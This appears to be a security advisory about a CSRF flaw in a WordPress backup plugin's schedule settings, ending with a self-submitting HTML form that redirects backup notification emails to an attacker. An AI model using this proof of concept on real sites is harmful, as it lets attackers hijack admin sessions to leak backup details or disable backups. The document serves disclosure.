The plugin does not have CSRF check in place when updating the schedule backup settings, which could allow an attacker to make a logged in admin change them via a CSRF attack. This could lead to cases where attackers can send backup notification emails to themselves, which contain more details. Or disable the automatic backup schedule
<form id="test" action="https://example.com/wp-admin/tools.php?page=wp-db-backup#schedule" method="POST">
<input type="text" name="wp_cron_schedule" value="daily">
<input type="text" name="cron_backup_recipient" value="[email protected]">
<input type="text" name="wp_cron_backup_options" value="SET">
</form>
<script>
document.getElementById("test").submit();
</script>